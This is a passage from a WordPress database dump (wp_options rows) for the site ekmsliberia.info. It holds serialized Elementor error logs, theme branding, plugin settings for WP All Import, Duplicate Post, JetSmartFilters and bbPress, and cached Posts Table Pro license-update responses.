undefined\";s:3:\"url\";s:91:\"https://ekmsliberia.info/wp-content/plugins/jet-smart-filters/assets/js/public.js?ver=3.1.2\";s:4:\"line\";s:1:\"1\";s:6:\"column\";s:5:\"24721\";}s:7:\"\0*\0file\";s:91:\"https://ekmsliberia.info/wp-content/plugins/jet-smart-filters/assets/js/public.js?ver=3.1.2\";s:7:\"\0*\0line\";s:1:\"1\";s:9:\"\0*\0column\";s:5:\"24721\";}s:32:\"d414fe066dc5e2309105f4d42d5283dc\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:7:\"\0*\0date\";s:19:\"2025-05-08 09:39:12\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:64:\"Cannot read properties of undefined (reading \\&#039;push\\&#039;)\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:26;s:14:\"\0*\0times_dates\";a:26:{i:0;s:19:\"2025-05-08 09:39:12\";i:1;s:19:\"2025-05-15 00:42:48\";i:2;s:19:\"2025-06-03 16:46:56\";i:3;s:19:\"2025-06-03 16:48:11\";i:4;s:19:\"2025-08-04 21:22:33\";i:5;s:19:\"2025-08-04 22:27:56\";i:6;s:19:\"2025-08-04 22:29:10\";i:7;s:19:\"2025-08-04 22:36:33\";i:8;s:19:\"2025-08-04 22:39:54\";i:9;s:19:\"2025-08-04 22:45:00\";i:10;s:19:\"2025-08-04 22:47:48\";i:11;s:19:\"2025-08-04 22:51:04\";i:12;s:19:\"2025-08-04 22:57:47\";i:13;s:19:\"2025-08-04 23:01:36\";i:14;s:19:\"2025-10-23 15:00:33\";i:15;s:19:\"2025-12-08 10:26:14\";i:16;s:19:\"2025-12-08 10:27:17\";i:17;s:19:\"2025-12-08 10:28:08\";i:18;s:19:\"2025-12-08 22:07:17\";i:19;s:19:\"2026-03-09 12:07:14\";i:20;s:19:\"2026-03-17 15:17:19\";i:21;s:19:\"2026-05-10 15:10:26\";i:22;s:19:\"2026-05-27 16:47:54\";i:23;s:19:\"2026-06-15 11:18:50\";i:24;s:19:\"2026-06-15 17:43:21\";i:25;s:19:\"2026-06-16 12:32:24\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1746697152\";s:7:\"message\";s:54:\"Cannot read properties of undefined (reading \\\'push\\\')\";s:3:\"url\";s:70:\"https://ekmsliberia.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"28760\";}s:7:\"\0*\0file\";s:70:\"https://ekmsliberia.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1\";s:7:\"\0*\0line\";s:1:\"2\";s:9:\"\0*\0column\";s:5:\"28760\";}s:32:\"4fc4c8835ce8475407776952d12bc065\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:7:\"\0*\0date\";s:19:\"2025-05-23 22:25:05\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:23:\"ReactDOM is not defined\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-05-23 22:25:05\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1748039105\";s:7:\"message\";s:23:\"ReactDOM is not defined\";s:3:\"url\";s:94:\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/js/admin-top-bar.min.js?ver=3.7.8\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:4:\"7743\";}s:7:\"\0*\0file\";s:94:\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/js/admin-top-bar.min.js?ver=3.7.8\";s:7:\"\0*\0line\";s:1:\"2\";s:9:\"\0*\0column\";s:4:\"7743\";}s:32:\"ac8e58a1c8438947907d059323067bdf\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:7:\"\0*\0date\";s:19:\"2025-06-23 11:02:39\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:75:\"undefined is not an object (evaluating \\&#039;this.subscribers.push\\&#039;)\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:5;s:14:\"\0*\0times_dates\";a:5:{i:0;s:19:\"2025-06-23 11:02:39\";i:1;s:19:\"2025-06-25 07:27:05\";i:2;s:19:\"2025-06-25 07:56:39\";i:3;s:19:\"2025-07-29 11:59:33\";i:4;s:19:\"2025-07-29 12:05:08\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1750676559\";s:7:\"message\";s:65:\"undefined is not an object (evaluating \\\'this.subscribers.push\\\')\";s:3:\"url\";s:70:\"https://ekmsliberia.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"28767\";}s:7:\"\0*\0file\";s:70:\"https://ekmsliberia.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1\";s:7:\"\0*\0line\";s:1:\"2\";s:9:\"\0*\0column\";s:5:\"28767\";}s:32:\"6c8f3cd672ebb255f7d9a354d23891c5\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-02-12 02:33:09\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:88:\"version_compare(): Passing null to parameter #2 ($version2) of type string is deprecated\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:284;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2026-06-01 04:44:51\";i:1;s:19:\"2026-06-01 16:44:33\";i:2;s:19:\"2026-06-02 04:44:06\";i:3;s:19:\"2026-06-02 20:35:26\";i:4;s:19:\"2026-06-03 04:44:47\";i:5;s:19:\"2026-06-03 16:44:31\";i:6;s:19:\"2026-06-04 04:44:39\";i:7;s:19:\"2026-06-04 16:44:30\";i:8;s:19:\"2026-06-05 12:32:53\";i:9;s:19:\"2026-06-05 16:44:36\";i:10;s:19:\"2026-06-06 04:44:16\";i:11;s:19:\"2026-06-06 16:44:04\";i:12;s:19:\"2026-06-07 04:44:36\";i:13;s:19:\"2026-06-07 16:44:01\";i:14;s:19:\"2026-06-07 16:44:05\";i:15;s:19:\"2026-06-08 04:44:03\";i:16;s:19:\"2026-06-08 16:44:13\";i:17;s:19:\"2026-06-09 04:44:23\";i:18;s:19:\"2026-06-09 16:44:37\";i:19;s:19:\"2026-06-09 17:11:49\";i:20;s:19:\"2026-06-10 04:44:22\";i:21;s:19:\"2026-06-10 16:44:34\";i:22;s:19:\"2026-06-11 04:44:06\";i:23;s:19:\"2026-06-11 17:05:53\";i:24;s:19:\"2026-06-12 04:52:02\";i:25;s:19:\"2026-06-12 16:44:34\";i:26;s:19:\"2026-06-13 04:44:35\";i:27;s:19:\"2026-06-15 09:37:12\";i:28;s:19:\"2026-06-15 16:44:10\";i:29;s:19:\"2026-06-16 04:44:33\";i:30;s:19:\"2026-06-16 16:44:32\";i:31;s:19:\"2026-06-17 04:44:31\";i:32;s:19:\"2026-06-17 16:44:04\";i:33;s:19:\"2026-06-18 04:44:33\";i:34;s:19:\"2026-06-18 16:44:05\";i:35;s:19:\"2026-06-19 04:44:34\";i:36;s:19:\"2026-06-19 16:44:34\";i:37;s:19:\"2026-06-20 04:44:04\";i:38;s:19:\"2026-06-20 16:44:34\";i:39;s:19:\"2026-06-21 04:44:31\";i:40;s:19:\"2026-06-21 16:44:34\";i:41;s:19:\"2026-06-22 04:44:06\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:88:\"version_compare(): Passing null to parameter #2 ($version2) of type string is deprecated\";s:4:\"file\";s:78:\"/home/ekmslib/public_html/wp-content/plugins/elementor-pro/license/updater.php\";s:4:\"line\";i:84;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:78:\"/home/ekmslib/public_html/wp-content/plugins/elementor-pro/license/updater.php\";s:7:\"\0*\0line\";i:84;}s:32:\"64612033995532ac37c67c6ed4b645fd\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-06-06 13:17:59\";s:7:\"\0*\0type\";s:7:\"warning\";s:10:\"\0*\0message\";s:56:\"Attempt to read property &quot;post_status&quot; on null\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:90;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2026-06-11 23:19:48\";i:1;s:19:\"2026-06-11 23:24:22\";i:2;s:19:\"2026-06-11 23:30:46\";i:3;s:19:\"2026-06-11 23:36:54\";i:4;s:19:\"2026-06-11 23:36:55\";i:5;s:19:\"2026-06-12 00:05:00\";i:6;s:19:\"2026-06-12 00:35:53\";i:7;s:19:\"2026-06-12 00:35:54\";i:8;s:19:\"2026-06-12 00:35:55\";i:9;s:19:\"2026-06-12 00:42:47\";i:10;s:19:\"2026-06-12 00:42:49\";i:11;s:19:\"2026-06-12 03:36:20\";i:12;s:19:\"2026-06-12 03:36:20\";i:13;s:19:\"2026-06-12 03:36:20\";i:14;s:19:\"2026-06-12 03:36:20\";i:15;s:19:\"2026-06-12 03:36:21\";i:16;s:19:\"2026-06-12 03:36:22\";i:17;s:19:\"2026-06-12 03:36:22\";i:18;s:19:\"2026-06-12 03:36:24\";i:19;s:19:\"2026-06-12 03:36:25\";i:20;s:19:\"2026-06-12 03:36:25\";i:21;s:19:\"2026-06-12 03:36:25\";i:22;s:19:\"2026-06-12 03:36:25\";i:23;s:19:\"2026-06-12 03:36:26\";i:24;s:19:\"2026-06-12 03:36:28\";i:25;s:19:\"2026-06-12 03:48:27\";i:26;s:19:\"2026-06-12 04:41:57\";i:27;s:19:\"2026-06-12 04:44:46\";i:28;s:19:\"2026-06-12 05:04:05\";i:29;s:19:\"2026-06-12 10:39:17\";i:30;s:19:\"2026-06-12 13:31:15\";i:31;s:19:\"2026-06-12 13:33:52\";i:32;s:19:\"2026-06-12 13:55:10\";i:33;s:19:\"2026-06-13 02:24:02\";i:34;s:19:\"2026-06-13 02:24:03\";i:35;s:19:\"2026-06-13 07:26:14\";i:36;s:19:\"2026-06-13 07:26:15\";i:37;s:19:\"2026-06-13 07:31:45\";i:38;s:19:\"2026-06-13 07:31:48\";i:39;s:19:\"2026-06-13 08:08:12\";i:40;s:19:\"2026-06-13 08:17:06\";i:41;s:19:\"2026-06-13 10:58:33\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:7:\"warning\";s:7:\"message\";s:46:\"Attempt to read property \"post_status\" on null\";s:4:\"file\";s:76:\"/home/ekmslib/public_html/wp-content/plugins/elementor/core/kits/manager.php\";s:4:\"line\";i:247;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:76:\"/home/ekmslib/public_html/wp-content/plugins/elementor/core/kits/manager.php\";s:7:\"\0*\0line\";i:247;}}','off'),(569,'oceanwp_theme_branding','EKMS LIBERIA','yes'),(570,'oceanwp_theme_name','EKMS','yes'),(571,'oceanwp_theme_author','Darius Barrolle, Andre Williams, Trokon Saykpa and Elvina Samuels','yes'),(572,'oceanwp_theme_author_url','','yes'),(573,'oceanwp_theme_description','','yes'),(574,'oceanwp_theme_screenshot','','yes'),(575,'oceanwp_hide_oceanwp_news','1','yes'),(576,'oceanwp_branding','','yes'),(595,'WPLANG','','yes'),(596,'new_admin_email','contact@ekmsliberia.info','yes'),(603,'rank_math_notifications','a:1:{i:0;a:2:{s:7:\"message\";s:396:\"We detected new post type(s) (oceanwp_library), and you would want to check the settings of <a href=\"https://ekmsliberia.info/wp-admin/admin.php?page=rank-math-options-titles#setting-panel-post-type-oceanwp_library\">Titles &amp; Meta page</a> and <a href=\"https://ekmsliberia.info/wp-admin/admin.php?page=rank-math-options-sitemap#setting-panel-sitemap-post-type-oceanwp_library\">the Sitemap</a>.\";s:7:\"options\";a:4:{s:2:\"id\";s:13:\"new_post_type\";s:7:\"classes\";s:0:\"\";s:4:\"type\";s:4:\"info\";s:6:\"screen\";s:3:\"any\";}}}','yes'),(607,'rank_math_sitemap_cache_files','a:0:{}','yes'),(635,'page_for_posts','82','yes'),(1137,'elementor_tracker_last_send','1781863064','yes'),(1873,'PMXI_Plugin_Options','a:27:{s:18:\"history_file_count\";i:10000;s:16:\"history_file_age\";i:365;s:15:\"highlight_limit\";i:10000;s:19:\"upload_max_filesize\";i:2048;s:13:\"post_max_size\";i:2048;s:14:\"max_input_time\";i:-1;s:18:\"max_execution_time\";i:-1;s:7:\"dismiss\";i:0;s:16:\"dismiss_speed_up\";i:0;s:18:\"dismiss_manage_top\";i:0;s:21:\"dismiss_manage_bottom\";i:0;s:13:\"html_entities\";i:0;s:11:\"utf8_decode\";i:0;s:12:\"cron_job_key\";s:9:\"sQJazurMG\";s:10:\"chunk_size\";i:32;s:9:\"pingbacks\";i:1;s:33:\"legacy_special_character_handling\";i:1;s:14:\"case_sensitive\";i:1;s:12:\"session_mode\";s:7:\"default\";s:17:\"enable_ftp_import\";i:0;s:16:\"large_feed_limit\";i:1000;s:26:\"cron_processing_time_limit\";i:120;s:6:\"secure\";i:1;s:11:\"log_storage\";i:5;s:10:\"cron_sleep\";s:0:\"\";s:4:\"port\";s:0:\"\";s:19:\"force_stream_reader\";i:0;}','yes'),(1874,'pmxi_is_migrated','3.5.2','yes'),(1877,'jwbp_version','0.3.5','yes'),(2052,'duplicate_post_copytitle','1','yes'),(2053,'duplicate_post_copydate','','yes'),(2054,'duplicate_post_copystatus','','yes'),(2055,'duplicate_post_copyslug','','yes'),(2056,'duplicate_post_copyexcerpt','1','yes'),(2057,'duplicate_post_copycontent','1','yes'),(2058,'duplicate_post_copythumbnail','1','yes'),(2059,'duplicate_post_copytemplate','1','yes'),(2060,'duplicate_post_copyformat','1','yes'),(2061,'duplicate_post_copyauthor','','yes'),(2062,'duplicate_post_copypassword','','yes'),(2063,'duplicate_post_copyattachments','','yes'),(2064,'duplicate_post_copychildren','','yes'),(2065,'duplicate_post_copycomments','','yes'),(2066,'duplicate_post_copymenuorder','1','yes'),(2067,'duplicate_post_taxonomies_blacklist','a:3:{i:0;s:17:\"resource_category\";i:1;s:12:\"resource_tag\";i:2;s:13:\"resource_type\";}','yes'),(2068,'duplicate_post_blacklist','','yes'),(2069,'duplicate_post_types_enabled','a:9:{i:0;s:4:\"post\";i:1;s:4:\"page\";i:2;s:8:\"document\";i:3;s:11:\"institution\";i:4;s:16:\"knowledge_broker\";i:5;s:12:\"mea_resource\";i:6;s:13:\"news_resource\";i:7;s:16:\"project_resource\";i:8;s:13:\"related_topic\";}','yes'),(2076,'duplicate_post_title_prefix','','yes'),(2077,'duplicate_post_title_suffix','','yes'),(2078,'duplicate_post_increase_menu_order_by','','yes'),(2079,'duplicate_post_roles','a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}','yes'),(3562,'jet-smart-filters-settings','a:7:{s:4:\"page\";s:26:\"jet-smart-filters-settings\";s:19:\"avaliable_providers\";a:10:{s:48:\"Jet_Smart_Filters_Provider_EPro_Archive_Products\";s:5:\"false\";s:39:\"Jet_Smart_Filters_Provider_EPro_Archive\";s:4:\"true\";s:37:\"Jet_Smart_Filters_Provider_EPro_Posts\";s:4:\"true\";s:40:\"Jet_Smart_Filters_Provider_EPro_Products\";s:5:\"false\";s:46:\"Jet_Smart_Filters_Provider_Jet_Engine_Calendar\";s:5:\"false\";s:37:\"Jet_Smart_Filters_Provider_Jet_Engine\";s:5:\"false\";s:39:\"Jet_Smart_Filters_Provider_Jet_Woo_Grid\";s:5:\"false\";s:39:\"Jet_Smart_Filters_Provider_Jet_Woo_List\";s:5:\"false\";s:46:\"Jet_Smart_Filters_Provider_WooCommerce_Archive\";s:5:\"false\";s:48:\"Jet_Smart_Filters_Provider_WooCommerce_Shortcode\";s:5:\"false\";}s:19:\"use_indexed_filters\";s:4:\"true\";s:20:\"avaliable_post_types\";a:12:{s:4:\"post\";s:5:\"false\";s:4:\"page\";s:5:\"false\";s:10:\"attachment\";s:5:\"false\";s:17:\"elementor_library\";s:5:\"false\";s:15:\"oceanwp_library\";s:5:\"false\";s:12:\"elementor-hf\";s:5:\"false\";s:8:\"document\";s:4:\"true\";s:11:\"institution\";s:5:\"false\";s:12:\"mea_resource\";s:5:\"false\";s:13:\"news_resource\";s:5:\"false\";s:16:\"project_resource\";s:5:\"false\";s:13:\"related_topic\";s:5:\"false\";}s:18:\"url_structure_type\";s:5:\"plain\";s:21:\"rewritable_post_types\";a:9:{s:4:\"post\";s:5:\"false\";s:14:\"e-landing-page\";s:5:\"false\";s:8:\"document\";s:5:\"false\";s:13:\"ekms_bulletin\";s:5:\"false\";s:11:\"institution\";s:5:\"false\";s:16:\"knowledge_broker\";s:5:\"false\";s:12:\"mea_resource\";s:5:\"false\";s:16:\"project_resource\";s:5:\"false\";s:13:\"related_topic\";s:5:\"false\";}s:18:\"ajax_request_types\";s:7:\"default\";}','yes');
INSERT INTO `wp_options` VALUES (3580,'edd_sl_6b1d515a179637893a708bca741f882a','a:2:{s:7:\"timeout\";i:1573541857;s:5:\"value\";s:2923:\"{\"new_version\":\"2.1.4\",\"stable_version\":\"2.1.4\",\"name\":\"Posts Table Pro\",\"slug\":\"posts-data-table-pro\",\"url\":\"https:\\/\\/barn2.co.uk\\/wordpress-plugins\\/posts-table-pro\\/?changelog=1\",\"last_updated\":\"2019-10-31 15:29:23\",\"homepage\":\"https:\\/\\/barn2.co.uk\\/wordpress-plugins\\/posts-table-pro\\/\",\"package\":\"\",\"download_link\":\"\",\"sections\":{\"description\":\"<p>This dynamic WordPress table plugin takes any type of WordPress content and lists it in an instant table with searching, sorting and filtering. List pages, posts, documents, audio, or any custom post type.<\\/p>\\n\",\"changelog\":\"<p>2.1.4<br \\/>\\nRelease date 30 October 2019<\\/p>\\n<ul>\\n<li>Tested up to WordPress 5.3 and WooCommerce 3.8.<\\/li>\\n<li>Fix a bug with several table options where setting in the main settings was not applied correctly.<\\/li>\\n<li>Update Russian translations.<\\/li>\\n<li>Refactored code to use updated plugin library.<\\/li>\\n<\\/ul>\\n<p>2.1.3<br \\/>\\nRelease date 7 March 2019<\\/p>\\n<ul>\\n<li>Fix: Formatting and sorting of date custom fields in EU\\/AU date format (dd\\/mm\\/yyyy or dd\\/mm\\/yy).<\\/li>\\n<li>Fix: Ensure sorting for date custom field works correctly when 1 or more posts is missing custom field data.<\\/li>\\n<li>Fix: Ensure custom taxonomies used as dates are correctly formatted when using the \'date_format\' option.<\\/li>\\n<li>Fix: Totals and pagination were wrong after deleting search term, when an initial \'search_term\' was set and using lazy load.<\\/li>\\n<li>Dev: New filters for date formatting.<\\/li>\\n<\\/ul>\\n\"},\"banners\":{\"high\":\"\",\"low\":\"\"},\"icons\":{\"1x\":\"https:\\/\\/barn2.co.uk\\/wp-content\\/uploads\\/edd\\/2016\\/10\\/ptp-main-image-128x128.jpg\",\"2x\":\"https:\\/\\/barn2.co.uk\\/wp-content\\/uploads\\/edd\\/2016\\/10\\/ptp-main-image-256x256.jpg\"},\"description\":[\"<p>This dynamic WordPress table plugin takes any type of WordPress content and lists it in an instant table with searching, sorting and filtering. List pages, posts, documents, audio, or any custom post type.<\\/p>\\n\"],\"changelog\":[\"<p>2.1.4<br \\/>\\nRelease date 30 October 2019<\\/p>\\n<ul>\\n<li>Tested up to WordPress 5.3 and WooCommerce 3.8.<\\/li>\\n<li>Fix a bug with several table options where setting in the main settings was not applied correctly.<\\/li>\\n<li>Update Russian translations.<\\/li>\\n<li>Refactored code to use updated plugin library.<\\/li>\\n<\\/ul>\\n<p>2.1.3<br \\/>\\nRelease date 7 March 2019<\\/p>\\n<ul>\\n<li>Fix: Formatting and sorting of date custom fields in EU\\/AU date format (dd\\/mm\\/yyyy or dd\\/mm\\/yy).<\\/li>\\n<li>Fix: Ensure sorting for date custom field works correctly when 1 or more posts is missing custom field data.<\\/li>\\n<li>Fix: Ensure custom taxonomies used as dates are correctly formatted when using the \'date_format\' option.<\\/li>\\n<li>Fix: Totals and pagination were wrong after deleting search term, when an initial \'search_term\' was set and using lazy load.<\\/li>\\n<li>Dev: New filters for date formatting.<\\/li>\\n<\\/ul>\\n\"]}\";}','no'),(3877,'widget_bbp_login_widget','a:3:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:8:\"register\";s:0:\"\";s:8:\"lostpass\";s:0:\"\";}i:3;a:3:{s:5:\"title\";s:5:\"Login\";s:8:\"register\";s:0:\"\";s:8:\"lostpass\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(3878,'widget_bbp_views_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3879,'widget_bbp_search_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3880,'widget_bbp_forums_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3881,'widget_bbp_topics_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3882,'widget_bbp_replies_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3883,'widget_bbp_stats_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3884,'_bbp_private_forums','a:0:{}','yes'),(3885,'_bbp_hidden_forums','a:0:{}','yes'),(3886,'_bbp_db_version','263','yes'),(3887,'_bbp_edit_lock','5','yes'),(3888,'_bbp_throttle_time','10','yes'),(3889,'_bbp_allow_anonymous','0','yes'),(3890,'_bbp_allow_global_access','1','yes'),(3891,'_bbp_default_role','bbp_participant','yes'),(3892,'_bbp_allow_revisions','1','yes'),(3893,'_bbp_enable_favorites','1','yes'),(3894,'_bbp_enable_subscriptions','1','yes'),(3895,'_bbp_allow_topic_tags','1','yes'),(3896,'_bbp_allow_search','1','yes'),(3897,'_bbp_use_wp_editor','1','yes'),(3898,'_bbp_use_autoembed','1','yes'),(3899,'_bbp_thread_replies_depth','2','yes'),(3900,'_bbp_allow_threaded_replies','1','yes'),(3901,'_bbp_topics_per_page','15','yes'),(3902,'_bbp_replies_per_page','15','yes'),(3903,'_bbp_topics_per_rss_page','25','yes'),(3904,'_bbp_replies_per_rss_page','25','yes'),(3905,'_bbp_root_slug','forums','yes'),(3906,'_bbp_include_root','1','yes'),(3907,'_bbp_show_on_root','forums','yes'),(3908,'_bbp_forum_slug','forum','yes'),(3909,'_bbp_topic_slug','topic','yes'),(3910,'_bbp_topic_tag_slug','topic-tag','yes'),(3911,'_bbp_view_slug','view','yes'),(3912,'_bbp_reply_slug','reply','yes'),(3913,'_bbp_search_slug','search','yes'),(3914,'_bbp_user_slug','users','yes'),(3915,'_bbp_topic_archive_slug','topics','yes'),(3916,'_bbp_reply_archive_slug','replies','yes'),(3917,'_bbp_user_favs_slug','favorites','yes'),(3918,'_bbp_user_subs_slug','subscriptions','yes'),(4023,'ptp_shortcode_defaults','a:23:{s:9:\"post_type\";s:4:\"post\";s:7:\"columns\";s:0:\"\";s:10:\"image_size\";s:5:\"70x70\";s:14:\"content_length\";s:2:\"15\";s:14:\"excerpt_length\";s:2:\"-1\";s:5:\"links\";s:29:\"title,tax:resource_categories\";s:10:\"post_limit\";s:3:\"500\";s:13:\"rows_per_page\";s:2:\"25\";s:7:\"sort_by\";s:5:\"title\";s:14:\"sort_by_custom\";s:0:\"\";s:10:\"sort_order\";s:0:\"\";s:7:\"filters\";s:4:\"true\";s:14:\"filters_custom\";s:0:\"\";s:11:\"page_length\";s:3:\"top\";s:10:\"search_box\";s:3:\"top\";s:6:\"totals\";s:6:\"bottom\";s:10:\"pagination\";s:6:\"bottom\";s:11:\"paging_type\";s:12:\"full_numbers\";s:12:\"reset_button\";b:1;s:8:\"lightbox\";b:0;s:10:\"shortcodes\";b:0;s:9:\"lazy_load\";b:0;s:5:\"cache\";b:0;}','yes'),(4024,'ptp_misc_settings','a:1:{s:12:\"cache_expiry\";i:6;}','yes'),(4039,'widget_displaycategorieswidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(4176,'ai1wmte_plugin_key','1','yes'),(4250,'edd_api_request_b7d22b991615117aa64bfba84de62b51','a:2:{s:7:\"timeout\";i:1573542292;s:5:\"value\";s:3309:\"{\"new_version\":\"2.1.4\",\"stable_version\":\"2.1.4\",\"name\":\"Posts Table Pro\",\"slug\":\"posts-data-table-pro\",\"url\":\"https:\\/\\/barn2.co.uk\\/wordpress-plugins\\/posts-table-pro\\/?changelog=1\",\"last_updated\":\"2019-10-31 15:29:23\",\"homepage\":\"https:\\/\\/barn2.co.uk\\/wordpress-plugins\\/posts-table-pro\\/\",\"package\":\"https:\\/\\/barn2.co.uk\\/edd-sl\\/package_download\\/MTU3NDc0MTA5MzpiMDVjZDFhYmNiMzAzZDU5NDIyODAxOGQ4NDU2NDE1MDo4MzgxOjNmNWNiZTEwYWVjOWQyOWVmNTgzNDRjZmE4OTJmNzljOmh0dHBzQC8vZWttc2xpYmVyaWEuaW5mbzow\",\"download_link\":\"https:\\/\\/barn2.co.uk\\/edd-sl\\/package_download\\/MTU3NDc0MTA5MzpiMDVjZDFhYmNiMzAzZDU5NDIyODAxOGQ4NDU2NDE1MDo4MzgxOjNmNWNiZTEwYWVjOWQyOWVmNTgzNDRjZmE4OTJmNzljOmh0dHBzQC8vZWttc2xpYmVyaWEuaW5mbzow\",\"sections\":{\"description\":\"<p>This dynamic WordPress table plugin takes any type of WordPress content and lists it in an instant table with searching, sorting and filtering. List pages, posts, documents, audio, or any custom post type.<\\/p>\\n\",\"changelog\":\"<p>2.1.4<br \\/>\\nRelease date 30 October 2019<\\/p>\\n<ul>\\n<li>Tested up to WordPress 5.3 and WooCommerce 3.8.<\\/li>\\n<li>Fix a bug with several table options where setting in the main settings was not applied correctly.<\\/li>\\n<li>Update Russian translations.<\\/li>\\n<li>Refactored code to use updated plugin library.<\\/li>\\n<\\/ul>\\n<p>2.1.3<br \\/>\\nRelease date 7 March 2019<\\/p>\\n<ul>\\n<li>Fix: Formatting and sorting of date custom fields in EU\\/AU date format (dd\\/mm\\/yyyy or dd\\/mm\\/yy).<\\/li>\\n<li>Fix: Ensure sorting for date custom field works correctly when 1 or more posts is missing custom field data.<\\/li>\\n<li>Fix: Ensure custom taxonomies used as dates are correctly formatted when using the \'date_format\' option.<\\/li>\\n<li>Fix: Totals and pagination were wrong after deleting search term, when an initial \'search_term\' was set and using lazy load.<\\/li>\\n<li>Dev: New filters for date formatting.<\\/li>\\n<\\/ul>\\n\"},\"banners\":{\"high\":\"\",\"low\":\"\"},\"icons\":{\"1x\":\"https:\\/\\/barn2.co.uk\\/wp-content\\/uploads\\/edd\\/2016\\/10\\/ptp-main-image-128x128.jpg\",\"2x\":\"https:\\/\\/barn2.co.uk\\/wp-content\\/uploads\\/edd\\/2016\\/10\\/ptp-main-image-256x256.jpg\"},\"description\":[\"<p>This dynamic WordPress table plugin takes any type of WordPress content and lists it in an instant table with searching, sorting and filtering. List pages, posts, documents, audio, or any custom post type.<\\/p>\\n\"],\"changelog\":[\"<p>2.1.4<br \\/>\\nRelease date 30 October 2019<\\/p>\\n<ul>\\n<li>Tested up to WordPress 5.3 and WooCommerce 3.8.<\\/li>\\n<li>Fix a bug with several table options where setting in the main settings was not applied correctly.<\\/li>\\n<li>Update Russian translations.<\\/li>\\n<li>Refactored code to use updated plugin library.<\\/li>\\n<\\/ul>\\n<p>2.1.3<br \\/>\\nRelease date 7 March 2019<\\/p>\\n<ul>\\n<li>Fix: Formatting and sorting of date custom fields in EU\\/AU date format (dd\\/mm\\/yyyy or dd\\/mm\\/yy).<\\/li>\\n<li>Fix: Ensure sorting for date custom field works correctly when 1 or more posts is missing custom field data.<\\/li>\\n<li>Fix: Ensure custom taxonomies used as dates are correctly formatted when using the \'date_format\' option.<\\/li>\\n<li>Fix: Totals and pagination were wrong after deleting search term, when an initial \'search_term\' was set and using lazy load.<\\/li>\\n<li>Dev: New filters for date formatting.<\\/li>\\n<\\/ul>\\n\"]}\";}','no'),(4251,'edd_sl_b7d22b991615117aa64bfba84de62b51','a:2:{s:7:\"timeout\";i:1603301990;s:5:\"value\";s:3897:\"{\"new_version\":\"2.2.1\",\"stable_version\":\"2.2.1\",\"name\":\"Posts Table Pro\",\"slug\":\"posts-data-table-pro\",\"url\":\"https:\\/\\/barn2.co.uk\\/wordpress-plugins\\/posts-table-pro\\/?changelog=1\",\"last_updated\":\"2020-10-15 15:18:39\",\"homepage\":\"https:\\/\\/barn2.co.uk\\/wordpress-plugins\\/posts-table-pro\\/\",\"package\":\"https:\\/\\/barn2.co.uk\\/edd-sl\\/package_download\\/MTYwNDUwNDM5MTpiMDVjZDFhYmNiMzAzZDU5NDIyODAxOGQ4NDU2NDE1MDo4MzgxOjAzYTBhOGE0YjNlMzUyMjE4ZjVlMjdlYzg2M2I2OTJjOmh0dHBzQC8vZWttc2xpYmVyaWEuaW5mbzow\",\"download_link\":\"https:\\/\\/barn2.co.uk\\/edd-sl\\/package_download\\/MTYwNDUwNDM5MTpiMDVjZDFhYmNiMzAzZDU5NDIyODAxOGQ4NDU2NDE1MDo4MzgxOjAzYTBhOGE0YjNlMzUyMjE4ZjVlMjdlYzg2M2I2OTJjOmh0dHBzQC8vZWttc2xpYmVyaWEuaW5mbzow\",\"sections\":{\"description\":\"<p>This dynamic WordPress table plugin takes any type of 